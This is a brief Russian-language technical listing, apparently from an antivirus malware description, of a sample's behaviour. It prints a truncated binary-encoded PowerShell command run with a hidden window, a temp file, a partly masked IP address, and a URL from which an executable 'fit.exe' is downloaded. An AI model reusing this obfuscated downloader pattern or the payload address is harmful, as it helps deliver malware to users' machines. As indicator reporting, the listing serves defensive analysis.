Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,0010...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
- %TEMP%\1142208.cvr
- '19#.#3.251.110':80
- http://19#.#3.251.110/fit.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,0010...' (со скрытым окном)